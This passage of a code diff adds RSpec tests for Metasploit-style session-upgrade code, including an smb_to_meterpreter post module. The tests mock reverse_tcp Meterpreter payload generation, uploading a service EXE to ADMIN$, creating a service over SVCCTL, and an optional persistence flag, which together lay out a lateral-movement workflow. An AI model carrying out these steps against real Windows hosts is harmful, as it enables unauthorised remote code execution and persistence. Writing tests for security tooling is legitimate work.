+        expect(call_count).to eq(3)
+        expect(subject).to have_received(:sleep).with(2).once
+        expect(subject).to have_received(:sleep).with(1).once
+      end
+    end
+  end
 end

--- a/spec/lib/msf/core/post/session_upgrade_spec.rb
+++ b/spec/lib/msf/core/post/session_upgrade_spec.rb
@@ -1,0 +1,408 @@
+# frozen_string_literal: true
+
+require 'spec_helper'
+
+# rubocop:disable Metrics/BlockLength
+RSpec.describe Msf::Post::SessionUpgrade do
+  subject do
+    context_described_class = described_class
+
+    klass = Class.new(Msf::Post) do
+      include context_described_class
+    end
+
+    klass.new
+  end
+
+  describe 'option registration' do
+    describe 'LHOST' do
+      it 'is registered as an OptAddressLocal' do
+        expect(subject.options['LHOST']).to be_a(Msf::OptAddressLocal)
+      end
+
+      it 'is not required' do
+        expect(subject.options['LHOST'].required?).to be(false)
+      end
+    end
+
+    describe 'LPORT' do
+      it 'is registered as an OptInt' do
+        expect(subject.options['LPORT']).to be_a(Msf::OptInt)
+      end
+
+      it 'has a default value of 4444' do
+        expect(subject.options['LPORT'].default).to eq(4444)
+      end
+
+      it 'is required' do
+        expect(subject.options['LPORT'].required?).to be(true)
+      end
+    end
+
+    describe 'HANDLER' do
+      it 'is registered as an OptBool' do
+        expect(subject.options['HANDLER']).to be_a(Msf::OptBool)
+      end
+
+      it 'has a default value of true' do
+        expect(subject.options['HANDLER'].default).to eq(true)
+      end
+
+      it 'is required' do
+        expect(subject.options['HANDLER'].required?).to be(true)
+      end
+    end
+
+    describe 'HANDLE_TIMEOUT' do
+      it 'is registered as an OptInt' do
+        expect(subject.options['HANDLE_TIMEOUT']).to be_a(Msf::OptInt)
+      end
+
+      it 'has a default value of 30' do
+        expect(subject.options['HANDLE_TIMEOUT'].default).to eq(30)
+      end
+
+      it 'is required' do
+        expect(subject.options['HANDLE_TIMEOUT'].required?).to be(true)
+      end
+
+      it 'is an advanced option' do
+        expect(subject.options['HANDLE_TIMEOUT'].advanced?).to be(true)
+      end
+    end
+  end
+
+  describe '#resolve_lhost' do
+    let(:mock_session) { double('session', tunnel_local: '') }
+    let(:framework_datastore) { {} }
+
+    before do
+      allow(subject).to receive(:session).and_return(mock_session)
+      allow(subject.framework).to receive(:datastore).and_return(framework_datastore)
+      allow(subject).to receive(:print_error)
+    end
+
+    context 'when module datastore LHOST is set' do
+      before do
+        subject.datastore['LHOST'] = '10.0.0.1'
+      end
+
+      it 'returns the module datastore LHOST' do
+        expect(subject.send(:resolve_lhost)).to eq('10.0.0.1')
+      end
+    end
+
+    context 'when module LHOST is blank but framework LHOST is set' do
+      let(:framework_datastore) { { 'LHOST' => '10.0.0.2' } }
+
+      before do
+        subject.datastore['LHOST'] = ''
+      end
+
+      it 'returns the framework datastore LHOST' do
+        expect(subject.send(:resolve_lhost)).to eq('10.0.0.2')
+      end
+    end
+
+    context 'when both datastores are blank but session tunnel_local has a host' do
+      let(:mock_session) { double('session', tunnel_local: '192.168.1.5:4444') }
+
+      before do
+        subject.datastore['LHOST'] = ''
+      end
+
+      it 'returns the host extracted from tunnel_local' do
+        expect(subject.send(:resolve_lhost)).to eq('192.168.1.5')
+      end
+    end
+
+    context 'when both datastores are blank and tunnel_local is "Local Pipe"' do
+      let(:mock_session) { double('session', tunnel_local: 'Local Pipe') }
+
+      before do
+        subject.datastore['LHOST'] = ''
+      end
+
+      it 'returns nil' do
+        expect(subject.send(:resolve_lhost)).to be_nil
+      end
+
+      it 'prints an error' do
+        subject.send(:resolve_lhost)
+        expect(subject).to have_received(:print_error).with(/Cannot determine LHOST/)
+      end
+    end
+
+    context 'when both datastores are blank and tunnel_local host portion is blank' do
+      let(:mock_session) { double('session', tunnel_local: ':4444') }
+
+      before do
+        subject.datastore['LHOST'] = ''
+      end
+
+      it 'returns nil' do
+        expect(subject.send(:resolve_lhost)).to be_nil
+      end
+
+      it 'prints an error' do
+        subject.send(:resolve_lhost)
+        expect(subject).to have_received(:print_error).with(/Cannot determine LHOST/)
+      end
+    end
+
+    context 'when all sources are blank' do
+      let(:mock_session) { double('session', tunnel_local: '') }
+
+      before do
+        subject.datastore['LHOST'] = ''
+      end
+
+      it 'returns nil' do
+        expect(subject.send(:resolve_lhost)).to be_nil
+      end
+
+      it 'prints an error' do
+        subject.send(:resolve_lhost)
+        expect(subject).to have_received(:print_error).with(/Unable to determine LHOST/)
+      end
+    end
+  end
+
+  describe '#start_upgrade_handler' do
+    let(:handler_mod) do
+      double(
+        'handler_module',
+        datastore: {},
+        job_id: 42
+      )
+    end
+    let(:mock_exploits) { double('exploits') }
+    let(:mock_jobs) { double('jobs', :[] => double('job')) }
+
+    before do
+      allow(subject).to receive(:print_status)
+      allow(subject).to receive(:print_error)
+      allow(subject).to receive(:user_input).and_return(nil)
+      allow(subject).to receive(:user_output).and_return(nil)
+      allow(Rex::ThreadSafe).to receive(:sleep)
+
+      subject.datastore['HANDLER'] = true
+      subject.datastore['PAYLOAD'] = 'windows/meterpreter/reverse_tcp'
+      subject.datastore['LPORT'] = 4433
+
+      allow(subject).to receive(:framework).and_return(
+        double('framework', exploits: mock_exploits, jobs: mock_jobs)
+      )
+      allow(mock_exploits).to receive(:create).with('multi/handler').and_return(handler_mod)
+      allow(handler_mod).to receive(:exploit_simple)
+      allow(subject).to receive(:check_for_listener).and_return(false)
+    end
+
+    it 'raises failure when port is already in use' do
+      allow(subject).to receive(:check_for_listener).and_return(true)
+      expect {
+        subject.send(:start_upgrade_handler, '192.0.2.1')
+      }.to raise_error(Msf::Post::Failed, /already in use/)
+    end
+
+    it 'raises failure when handler job disappears after start' do
+      allow(mock_jobs).to receive(:[]).and_return(nil)
+      expect {
+        subject.send(:start_upgrade_handler, '192.0.2.1')
+      }.to raise_error(Msf::Post::Failed, /failed to start/)
+    end
+
+    it 'configures the handler with correct payload, LHOST, and LPORT' do
+      subject.send(:start_upgrade_handler, '192.0.2.1')
+      expect(handler_mod.datastore['PAYLOAD']).to eq('windows/meterpreter/reverse_tcp')
+      expect(handler_mod.datastore['LHOST']).to eq('192.0.2.1')
+      expect(handler_mod.datastore['LPORT']).to eq(4433)
+    end
+
+    it 'returns the job ID string on success' do
+      result = subject.send(:start_upgrade_handler, '192.0.2.1')
+      expect(result).to eq('42')
+    end
+
+    it 'stores the job ID in @upgrade_handler_job_id' do
+      subject.send(:start_upgrade_handler, '192.0.2.1')
+      expect(subject.instance_variable_get(:@upgrade_handler_job_id)).to eq('42')
+    end
+  end
+
+  describe '#cleanup_upgrade_handler' do
+    let(:mock_jobs) { double('jobs') }
+
+    before do
+      allow(subject).to receive(:print_status)
+      allow(subject).to receive(:print_error)
+      allow(subject).to receive(:framework).and_return(
+        double('framework', jobs: mock_jobs)
+      )
+    end
+
+    it 'stops the job when @upgrade_handler_job_id is set and job exists' do
+      allow(mock_jobs).to receive(:[]).with('42').and_return(double('job'))
+      allow(mock_jobs).to receive(:stop_job).with('42')
+      subject.instance_variable_set(:@upgrade_handler_job_id, '42')
+
+      subject.send(:cleanup_upgrade_handler)
+      expect(mock_jobs).to have_received(:stop_job).with('42')
+    end
+
+    it 'clears @upgrade_handler_job_id after stopping' do
+      allow(mock_jobs).to receive(:[]).with('42').and_return(double('job'))
+      allow(mock_jobs).to receive(:stop_job).with('42')
+      subject.instance_variable_set(:@upgrade_handler_job_id, '42')
+
+      subject.send(:cleanup_upgrade_handler)
+      expect(subject.instance_variable_get(:@upgrade_handler_job_id)).to be_nil
+    end
+
+    it 'does nothing when @upgrade_handler_job_id is nil' do
+      subject.instance_variable_set(:@upgrade_handler_job_id, nil)
+      expect { subject.send(:cleanup_upgrade_handler) }.not_to raise_error
+    end
+
+    it 'handles case where job ID is set but job no longer exists' do
+      allow(mock_jobs).to receive(:[]).with('42').and_return(nil)
+      subject.instance_variable_set(:@upgrade_handler_job_id, '42')
+
+      expect { subject.send(:cleanup_upgrade_handler) }.not_to raise_error
+      expect(subject.instance_variable_get(:@upgrade_handler_job_id)).to be_nil
+    end
+  end
+
+  describe '#generate_upgrade_payload' do
+    let(:mock_payloads) { double('payloads') }
+
+    before do
+      allow(subject).to receive(:print_error)
+      allow(subject).to receive(:framework).and_return(
+        double('framework', payloads: mock_payloads)
+      )
+    end
+
+    context 'when a valid payload name is provided' do
+      let(:payload_obj) { double('payload', generate_simple: "\x90\x90\xcc") }
+
+      before do
+        allow(mock_payloads).to receive(:create).with('windows/meterpreter/reverse_tcp').and_return(payload_obj)
+      end
+
+      it 'returns raw payload bytes' do
+        result = subject.generate_upgrade_payload('192.0.2.1', 4433, 'windows/meterpreter/reverse_tcp')
+        expect(result).to eq("\x90\x90\xcc")
+      end
+
+      it 'calls generate_simple with LHOST and LPORT' do
+        expect(payload_obj).to receive(:generate_simple).with('OptionStr' => 'LHOST=192.0.2.1 LPORT=4433')
+        subject.generate_upgrade_payload('192.0.2.1', 4433, 'windows/meterpreter/reverse_tcp')
+      end
+    end
+
+    context 'when an invalid payload name is provided' do
+      before do
+        allow(mock_payloads).to receive(:create).with('invalid/payload').and_return(nil)
+      end
+
+      it 'returns nil' do
+        result = subject.generate_upgrade_payload('192.0.2.1', 4433, 'invalid/payload')
+        expect(result).to be_nil
+      end
+
+      it 'prints an error message' do
+        subject.generate_upgrade_payload('192.0.2.1', 4433, 'invalid/payload')
+        expect(subject).to have_received(:print_error).with(/Invalid payload/)
+      end
+    end
+
+    context 'when payload does not respond to generate_simple' do
+      let(:payload_obj) { double('payload') }
+
+      before do
+        allow(mock_payloads).to receive(:create).with('windows/meterpreter/reverse_tcp').and_return(payload_obj)
+      end
+
+      it 'returns nil' do
+        result = subject.generate_upgrade_payload('192.0.2.1', 4433, 'windows/meterpreter/reverse_tcp')
+        expect(result).to be_nil
+      end
+
+      it 'prints an error message' do
+        subject.generate_upgrade_payload('192.0.2.1', 4433, 'windows/meterpreter/reverse_tcp')
+        expect(subject).to have_received(:print_error).with(/does not support generate_simple/)
+      end
+    end
+  end
+
+  describe '#wait_for_upgrade_session' do
+    let(:mock_sessions) { double('sessions') }
+
+    before do
+      allow(subject).to receive(:print_status)
+      allow(subject).to receive(:print_good)
+      allow(subject).to receive(:print_error)
+      allow(Rex::ThreadSafe).to receive(:sleep)
+
+      subject.datastore['HANDLE_TIMEOUT'] = 2
+
+      allow(subject).to receive(:framework).and_return(
+        double('framework', sessions: mock_sessions)
+      )
+    end
+
+    context 'when a new session appears within timeout' do
+      before do
+        allow(mock_sessions).to receive(:keys).and_return([1, 2], [1, 2, 3])
+      end
+
+      it 'returns true' do
+        result = subject.send(:wait_for_upgrade_session, Set[1, 2])
+        expect(result).to be(true)
+      end
+
+      it 'prints a success message' do
+        subject.send(:wait_for_upgrade_session, Set[1, 2])
+        expect(subject).to have_received(:print_good).with(/session opened/)
+      end
+    end
+
+    context 'when no new session appears within timeout' do
+      before do
+        allow(mock_sessions).to receive(:keys).and_return([1, 2])
+      end
+
+      it 'returns false' do
+        result = subject.send(:wait_for_upgrade_session, Set[1, 2])
+        expect(result).to be(false)
+      end
+
+      it 'prints an error message' do
+        subject.send(:wait_for_upgrade_session, Set[1, 2])
+        expect(subject).to have_received(:print_error).with(/No session received/)
+      end
+    end
+
+    context 'when pre-existing sessions are present' do
+      before do
+        # Sessions 1 and 2 already exist; no new ones appear
+        allow(mock_sessions).to receive(:keys).and_return([1, 2])
+      end
+
+      it 'ignores pre-existing sessions and returns false on timeout' do
+        result = subject.send(:wait_for_upgrade_session, Set[1, 2])
+        expect(result).to be(false)
+      end
+    end
+  end
+
+  describe '#execute_upgrade' do
+    it 'raises NotImplementedError when not implemented by consuming module' do
+      expect do
+        subject.execute_upgrade('192.0.2.1')
+      end.to raise_error(NotImplementedError, /Consuming modules must implement execute_upgrade/)
+    end
+  end
+end
+# rubocop:enable Metrics/BlockLength

--- a/spec/lib/msf/ui/console/command_dispatcher/core_sessions_upgrade_spec.rb
+++ b/spec/lib/msf/ui/console/command_dispatcher/core_sessions_upgrade_spec.rb
@@ -1,0 +1,123 @@
+# frozen_string_literal: true
+
+require 'spec_helper'
+
+RSpec.describe Msf::Ui::Console::CommandDispatcher::Core do
+  include_context 'Msf::DBManager'
+  include_context 'Msf::UIDriver'
+
+  subject(:core) do
+    described_class.new(driver)
+  end
+
+  describe '#cmd_sessions -u (session upgrade routing)' do
+    let(:sess_id) { 1 }
+    let(:session) { double('session') }
+    let(:mock_input) { double('input') }
+    let(:mock_output) { double('output') }
+    let(:mock_module) { double('post_module') }
+
+    before(:each) do
+      allow(driver).to receive(:input).and_return(mock_input)
+      allow(driver).to receive(:output).and_return(mock_output)
+      allow(driver).to receive(:active_session=)
+      allow(core).to receive(:verify_session).with(sess_id).and_return(session)
+    end
+
+    context 'when session type is smb' do
+      before(:each) do
+        allow(session).to receive(:type).and_return('smb')
+      end
+
+      context 'when the upgrade module is available' do
+        before(:each) do
+          allow(framework.modules).to receive(:create).with('post/windows/manage/smb_to_meterpreter').and_return(mock_module)
+          allow(mock_module).to receive(:run_simple)
+          allow(session).to receive(:exploit_datastore).and_return(nil)
+        end
+
+        it 'routes to the smb_to_meterpreter module' do
+          expect(framework.modules).to receive(:create).with('post/windows/manage/smb_to_meterpreter').and_return(mock_module)
+          expect(mock_module).to receive(:run_simple).with(
+            hash_including(
+              'LocalInput' => mock_input,
+              'LocalOutput' => mock_output,
+              'Options' => hash_including('SESSION' => sess_id.to_s)
+            )
+          )
+
+          core.cmd_sessions('-u', sess_id.to_s)
+        end
+
+        it 'passes session datastore values to the upgrade module' do
+          exploit_datastore = {
+            'LHOST' => '192.0.2.1',
+            'LPORT' => 4444,
+            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+            'TARGET_ARCH' => 'x64'
+          }
+          allow(session).to receive(:exploit_datastore).and_return(exploit_datastore)
+
+          expect(mock_module).to receive(:run_simple).with(
+            hash_including(
+              'Options' => {
+                'SESSION' => sess_id.to_s,
+                'LHOST' => '192.0.2.1',
+                'LPORT' => 4444,
+                'TARGET_ARCH' => 'x64'
+              }
+            )
+          )
+
+          core.cmd_sessions('-u', sess_id.to_s)
+        end
+      end
+
+      context 'when the upgrade module is not available' do
+        before(:each) do
+          allow(framework.modules).to receive(:create).with('post/windows/manage/smb_to_meterpreter').and_return(nil)
+        end
+
+        it 'prints an error and does not attempt to run' do
+          expect(core).to receive(:print_error).with('Failed to create post/windows/manage/smb_to_meterpreter module.')
+
+          core.cmd_sessions('-u', sess_id.to_s)
+        end
+      end
+    end
+
+    context 'when session type is shell' do
+      before(:each) do
+        allow(session).to receive(:type).and_return('shell')
+        allow(session).to receive(:respond_to?).with(:response_timeout).and_return(false)
+        allow(session).to receive(:init_ui)
+        allow(session).to receive(:execute_script).with('post/multi/manage/shell_to_meterpreter')
+        allow(session).to receive(:reset_ui)
+      end
+
+      it 'routes to shell_to_meterpreter via execute_script' do
+        expect(session).to receive(:execute_script).with('post/multi/manage/shell_to_meterpreter')
+        expect(framework.modules).not_to receive(:create).with('post/windows/manage/smb_to_meterpreter')
+
+        core.cmd_sessions('-u', sess_id.to_s)
+      end
+    end
+
+    context 'when session type is meterpreter' do
+      before(:each) do
+        allow(session).to receive(:type).and_return('meterpreter')
+        allow(session).to receive(:respond_to?).with(:response_timeout).and_return(false)
+        allow(session).to receive(:init_ui)
+        allow(session).to receive(:execute_script).with('post/multi/manage/shell_to_meterpreter')
+        allow(session).to receive(:reset_ui)
+      end
+
+      it 'routes to shell_to_meterpreter via execute_script' do
+        expect(session).to receive(:execute_script).with('post/multi/manage/shell_to_meterpreter')
+        expect(framework.modules).not_to receive(:create).with('post/windows/manage/smb_to_meterpreter')
+
+        core.cmd_sessions('-u', sess_id.to_s)
+      end
+    end
+  end
+end

--- a/spec/modules/post/windows/manage/smb_to_meterpreter_spec.rb
+++ b/spec/modules/post/windows/manage/smb_to_meterpreter_spec.rb
@@ -1,0 +1,484 @@
+# frozen_string_literal: true
+
+require 'spec_helper'
+
+RSpec.describe 'post/windows/manage/smb_to_meterpreter' do
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  subject do
+    mod = load_and_create_module(
+      module_type: 'post',
+      reference_name: 'windows/manage/smb_to_meterpreter'
+    )
+    mod.datastore['SESSION'] = 1
+    mod
+  end
+
+  let(:tcp_socket) do
+    double('tcp_socket',
+      peerinfo: '192.0.2.1:445',
+      peerhost: '192.0.2.1'
+    )
+  end
+
+  let(:dispatcher) do
+    double('dispatcher', tcp_socket: tcp_socket)
+  end
+
+  let(:smb_client) do
+    double('RubySMB::Client',
+      dispatcher: dispatcher
+    )
+  end
+
+  let(:tree) do
+    double('tree')
+  end
+
+  let(:svcctl_pipe) do
+    double('svcctl_pipe')
+  end
+
+  let(:simple_client) do
+    double('simple_client')
+  end
+
+  let(:session) do
+    double('session',
+      type: 'smb',
+      client: smb_client,
+      simple_client: simple_client,
+      tunnel_local: '192.0.2.10:0',
+      exploit_datastore: {}
+    )
+  end
+
+  before(:each) do
+    allow(subject).to receive(:session).and_return(session)
+    allow(subject).to receive(:print_status)
+    allow(subject).to receive(:print_good)
+    allow(subject).to receive(:print_error)
+    allow(subject).to receive(:print_warning)
+    allow(subject).to receive(:vprint_status)
+    allow(subject).to receive(:vprint_good)
+    allow(subject).to receive(:vprint_warning)
+  end
+
+  describe '#validate_session!' do
+    context 'when session is disconnected' do
+      before do
+        allow(tcp_socket).to receive(:peerinfo).and_raise(Errno::ENOTCONN)
+      end
+
+      it 'prints error and returns false' do
+        expect(subject).to receive(:print_error).with(/not usable/)
+        expect(subject.send(:validate_session!)).to be false
+      end
+    end
+
+    context 'when session type is not smb' do
+      before do
+        allow(session).to receive(:type).and_return('meterpreter')
+      end
+
+      it 'prints error and returns false' do
+        expect(subject).to receive(:print_error).with(/Invalid session type/)
+        expect(subject.send(:validate_session!)).to be false
+      end
+    end
+
+    context 'when session is valid' do
+      it 'returns true' do
+        expect(subject.send(:validate_session!)).to be true
+      end
+    end
+  end
+
+  describe '#resolve_lhost' do
+    context 'when module datastore LHOST is set' do
+      before do
+        subject.datastore['LHOST'] = '10.0.0.1'
+      end
+
+      it 'uses the module datastore value' do
+        expect(subject.send(:resolve_lhost)).to eq('10.0.0.1')
+      end
+    end
+
+    context 'when module LHOST is nil and framework global LHOST is set' do
+      before do
+        subject.datastore['LHOST'] = nil
+        framework.datastore['LHOST'] = '10.0.0.2'
+      end
+
+      after do
+        framework.datastore.delete('LHOST')
+      end
+
+      it 'uses the framework global LHOST' do
+        expect(subject.send(:resolve_lhost)).to eq('10.0.0.2')
+      end
+    end
+
+    context 'when no explicit LHOST is configured' do
+      before do
+        subject.datastore['LHOST'] = nil
+        framework.datastore.delete('LHOST')
+      end
+
+      it 'extracts host from session tunnel_local' do
+        allow(session).to receive(:tunnel_local).and_return('192.0.2.10:12345')
+        expect(subject.send(:resolve_lhost)).to eq('192.0.2.10')
+      end
+    end
+
+    context 'when tunnel_local is "Local Pipe"' do
+      before do
+        subject.datastore['LHOST'] = nil
+        framework.datastore.delete('LHOST')
+        allow(session).to receive(:tunnel_local).and_return('Local Pipe')
+      end
+
+      it 'prints error and returns nil' do
+        expect(subject).to receive(:print_error).with(/Cannot determine LHOST/)
+        expect(subject.send(:resolve_lhost)).to be_nil
+      end
+    end
+
+    context 'when no LHOST source is available' do
+      before do
+        subject.datastore['LHOST'] = nil
+        framework.datastore.delete('LHOST')
+        allow(session).to receive(:tunnel_local).and_return(nil)
+      end
+
+      it 'prints error and returns nil' do
+        expect(subject).to receive(:print_error).with(/Unable to determine LHOST/)
+        expect(subject.send(:resolve_lhost)).to be_nil
+      end
+    end
+  end
+
+  describe '#select_payload' do
+    context 'when TARGET_ARCH is x64' do
+      before do
+        subject.datastore['TARGET_ARCH'] = 'x64'
+      end
+
+      it 'returns windows/x64/meterpreter/reverse_tcp' do
+        expect(subject.send(:select_payload)).to eq('windows/x64/meterpreter/reverse_tcp')
+      end
+    end
+
+    context 'when TARGET_ARCH is x86' do
+      before do
+        subject.datastore['TARGET_ARCH'] = 'x86'
+      end
+
+      it 'returns windows/meterpreter/reverse_tcp' do
+        expect(subject.send(:select_payload)).to eq('windows/meterpreter/reverse_tcp')
+      end
+    end
+
+    context 'when PAYLOAD_OVERRIDE is set' do
+      before do
+        subject.datastore['PAYLOAD_OVERRIDE'] = 'windows/x64/meterpreter/reverse_https'
+        subject.datastore['TARGET_ARCH'] = 'x64'
+      end
+
+      it 'still returns the arch-based payload since run handles the override' do
+        expect(subject.send(:select_payload)).to eq('windows/x64/meterpreter/reverse_tcp')
+      end
+    end
+  end
+
+  describe '#service_name' do
+    context 'when SERVICE_NAME is set' do
+      before do
+        subject.datastore['SERVICE_NAME'] = 'CustomSvc'
+      end
+
+      it 'uses the configured service name' do
+        expect(subject.send(:service_name)).to eq('CustomSvc')
+      end
+    end
+
+    context 'when SERVICE_NAME is not set' do
+      before do
+        subject.datastore['SERVICE_NAME'] = nil
+      end
+
+      it 'generates a random name between 8 and 16 characters' do
+        name = subject.send(:service_name)
+        expect(name.length).to be_between(8, 16)
+        expect(name).to match(/\A[a-zA-Z]+\z/)
+      end
+    end
+  end
+
+  describe '#execute_upgrade' do
+    let(:scm_handle) { double('scm_handle') }
+    let(:svc_handle) { double('svc_handle') }
+    let(:file_handle) { double('file_handle') }
+
+    before do
+      subject.datastore['LHOST'] = '10.0.0.1'
+      subject.datastore['LPORT'] = 4444
+      subject.datastore['TARGET_ARCH'] = 'x64'
+      subject.datastore['PAYLOAD'] = 'windows/x64/meterpreter/reverse_tcp'
+      subject.datastore['SERVICE_PERSIST'] = false
+      subject.datastore['SERVICE_NAME'] = nil
+      subject.datastore['SERVICE_DISPLAY_NAME'] = nil
+      subject.datastore['SERVICE_FILENAME'] = nil
+
+      # Stub simple_client for ADMIN$ upload
+      allow(simple_client).to receive(:connect)
+      allow(simple_client).to receive(:disconnect)
+      allow(simple_client).to receive(:open).and_return(file_handle)
+      allow(simple_client).to receive(:delete)
+      allow(file_handle).to receive(:<<)
+      allow(file_handle).to receive(:close)
+
+      # Stub RubySMB client for SVCCTL
+      allow(smb_client).to receive(:tree_connect).and_return(tree)
+      allow(tree).to receive(:open_file).and_return(svcctl_pipe)
+      allow(svcctl_pipe).to receive(:bind)
+      allow(svcctl_pipe).to receive(:open_sc_manager_w).and_return(scm_handle)
+      allow(svcctl_pipe).to receive(:create_service_w).and_return(svc_handle)
+      allow(svcctl_pipe).to receive(:start_service_w)
+      allow(svcctl_pipe).to receive(:control_service)
+      allow(svcctl_pipe).to receive(:delete_service)
+      allow(svcctl_pipe).to receive(:close_service_handle)
+
+      # Stub payload generation
+      allow(subject).to receive(:generate_upgrade_payload).and_return("\x90" * 100)
+      allow(Msf::Util::EXE).to receive(:to_executable_fmt).and_return("MZ\x00" + "\x00" * 500)
+    end
+
+    context 'payload upload to ADMIN$' do
+      it 'connects to ADMIN$ share and uploads the service EXE' do
+        expect(simple_client).to receive(:connect).with("\\\\192.0.2.1\\ADMIN$")
+        expect(simple_client).to receive(:open).with(/\\.*\.exe/, 'rwct', 48000, read: true, write: true)
+        expect(file_handle).to receive(:<<).with(/\AMZ/)
+        expect(file_handle).to receive(:close)
+        subject.execute_upgrade('10.0.0.1')
+      end
+    end
+
+    context 'when ADMIN$ connection fails' do
+      before do
+        allow(simple_client).to receive(:connect).and_raise(RubySMB::Error::RubySMBError.new('access denied'))
+      end
+
+      it 'raises a failure' do
+        expect { subject.execute_upgrade('10.0.0.1') }.to raise_error(
+          Msf::Post::Failed, /Failed to connect to ADMIN\$ share/
+        )
+      end
+    end
+
+    context 'when payload generation fails' do
+      before do
+        allow(subject).to receive(:generate_upgrade_payload).and_return(nil)
+      end
+
+      it 'raises a failure' do
+        expect { subject.execute_upgrade('10.0.0.1') }.to raise_error(
+          Msf::Post::Failed, /Failed to generate payload/
+        )
+      end
+    end
+
+    context 'when EXE generation fails' do
+      before do
+        allow(Msf::Util::EXE).to receive(:to_executable_fmt).and_return(nil)
+      end
+
+      it 'raises a failure' do
+        expect { subject.execute_upgrade('10.0.0.1') }.to raise_error(
+          Msf::Post::Failed, /Failed to generate service EXE/
+        )
+      end
+    end
+
+    context 'SVCCTL service creation and start' do
+      it 'connects to IPC$ and creates a service pointing to the uploaded EXE' do
+        expect(smb_client).to receive(:tree_connect).with("\\\\192.0.2.1\\IPC$")
+        expect(svcctl_pipe).to receive(:create_service_w) do |_scm, _name, _display, bin_path|
+          expect(bin_path).to match(/%SYSTEMROOT%\\.*\.exe/)
+          svc_handle
+        end
+        expect(svcctl_pipe).to receive(:start_service_w).with(svc_handle)
+        subject.execute_upgrade('10.0.0.1')
+      end
+    end
+
+    context 'when IPC$ connection fails' do
+      before do
+        allow(smb_client).to receive(:tree_connect).and_raise(RubySMB::Error::RubySMBError.new('connection refused'))
+      end
+
+      it 'prints error and returns without raising' do
+        expect(subject).to receive(:print_error).with(/Failed to connect to IPC\$/)
+        expect { subject.execute_upgrade('10.0.0.1') }.not_to raise_error
+      end
+    end
+
+    context 'when SCManager returns ACCESS_DENIED' do
+      before do
+        allow(svcctl_pipe).to receive(:open_sc_manager_w).and_raise(
+          RubySMB::Dcerpc::Error::SvcctlError.new('ERROR_ACCESS_DENIED')
+        )
+      end
+
+      it 'prints insufficient privileges error' do
+        expect(subject).to receive(:print_error).with(/Insufficient privileges/)
+        subject.execute_upgrade('10.0.0.1')
+      end
+    end
+
+    context 'service cleanup' do
+      it 'deletes the service and uploaded file after execution' do
+        expect(svcctl_pipe).to receive(:delete_service).with(svc_handle)
+        expect(simple_client).to receive(:delete).with(/\\.*\.exe/)
+        subject.execute_upgrade('10.0.0.1')
+      end
+    end
+
+    context 'when SERVICE_PERSIST is true' do
+      before do
+        subject.datastore['SERVICE_PERSIST'] = true
+      end
+
+      it 'skips service deletion and file cleanup' do
+        expect(svcctl_pipe).not_to receive(:delete_service)
+        expect(simple_client).not_to receive(:delete)
+        subject.execute_upgrade('10.0.0.1')
+      end
+    end
+
+    context 'when service creation fails' do
+      before do
+        allow(svcctl_pipe).to receive(:create_service_w).and_raise(
+          RubySMB::Dcerpc::Error::SvcctlError.new('creation failed')
+        )
+      end
+
+      it 'prints error and still cleans up the uploaded file' do
+        expect(subject).to receive(:print_error).with(/Failed to create service/)
+        expect(simple_client).to receive(:delete)
+        subject.execute_upgrade('10.0.0.1')
+      end
+    end
+
+    context 'when service start times out' do
+      before do
+        allow(svcctl_pipe).to receive(:start_service_w).and_raise(
+          RubySMB::Dcerpc::Error::SvcctlError.new('ERROR_SERVICE_REQUEST_TIMEOUT')
+        )
+      end
+
+      it 'treats timeout as expected and continues cleanup' do
+        expect(subject).to receive(:vprint_status).with(/timed out, expected/)
+        expect(svcctl_pipe).to receive(:delete_service)
+        subject.execute_upgrade('10.0.0.1')
+      end
+    end
+
+    context 'when file cleanup fails' do
+      before do
+        allow(simple_client).to receive(:delete).and_raise(RubySMB::Error::RubySMBError.new('file locked'))
+      end
+
+      it 'prints warning about manual removal' do
+        expect(subject).to receive(:print_warning).with(/Could not delete.*Manual removal/)
+        subject.execute_upgrade('10.0.0.1')
+      end
+    end
+
+    context 'with custom SERVICE_FILENAME' do
+      before do
+        subject.datastore['SERVICE_FILENAME'] = 'custom_payload.exe'
+      end
+
+      it 'uses the specified filename for upload' do
+        expect(simple_client).to receive(:open).with("\\custom_payload.exe", 'rwct', 48000, read: true, write: true)
+        subject.execute_upgrade('10.0.0.1')
+      end
+    end
+  end
+
+  describe '#run' do
+    let(:scm_handle) { double('scm_handle') }
+    let(:svc_handle) { double('svc_handle') }
+    let(:file_handle) { double('file_handle') }
+    let(:mock_sessions) { double('sessions', keys: []) }
+
+    before do
+      subject.datastore['LHOST'] = '10.0.0.1'
+      subject.datastore['LPORT'] = 4444
+      subject.datastore['HANDLER'] = false
+      subject.datastore['TARGET_ARCH'] = 'x64'
+      subject.datastore['PAYLOAD_OVERRIDE'] = nil
+      subject.datastore['SERVICE_PERSIST'] = false
+      subject.datastore['SERVICE_NAME'] = nil
+      subject.datastore['SERVICE_DISPLAY_NAME'] = nil
+      subject.datastore['SERVICE_FILENAME'] = nil
+
+      # Stub framework.sessions to prevent SessionManager thread spawning
+      allow(framework).to receive(:sessions).and_return(mock_sessions)
+
+      allow(simple_client).to receive(:connect)
+      allow(simple_client).to receive(:disconnect)
+      allow(simple_client).to receive(:open).and_return(file_handle)
+      allow(simple_client).to receive(:delete)
+      allow(file_handle).to receive(:<<)
+      allow(file_handle).to receive(:close)
+
+      allow(smb_client).to receive(:tree_connect).and_return(tree)
+      allow(tree).to receive(:open_file).and_return(svcctl_pipe)
+      allow(svcctl_pipe).to receive(:bind)
+      allow(svcctl_pipe).to receive(:open_sc_manager_w).and_return(scm_handle)
+      allow(svcctl_pipe).to receive(:create_service_w).and_return(svc_handle)
+      allow(svcctl_pipe).to receive(:start_service_w)
+      allow(svcctl_pipe).to receive(:control_service)
+      allow(svcctl_pipe).to receive(:delete_service)
+      allow(svcctl_pipe).to receive(:close_service_handle)
+
+      allow(subject).to receive(:generate_upgrade_payload).and_return("\x90" * 100)
+      allow(Msf::Util::EXE).to receive(:to_executable_fmt).and_return("MZ\x00" + "\x00" * 500)
+    end
+
+    context 'when session is invalid' do
+      before do
+        allow(tcp_socket).to receive(:peerinfo).and_raise(Errno::ENOTCONN)
+      end
+
+      it 'returns early without executing' do
+        expect(smb_client).not_to receive(:tree_connect)
+        subject.run
+      end
+    end
+
+    context 'when LHOST cannot be resolved' do
+      before do
+        subject.datastore['LHOST'] = nil
+        framework.datastore.delete('LHOST')
+        allow(session).to receive(:tunnel_local).and_return(nil)
+      end
+
+      it 'raises a failure without executing' do
+        expect(smb_client).not_to receive(:tree_connect)
+        expect { subject.run }.to raise_error(Msf::Post::Failed, /LHOST/)
+      end
+    end
+
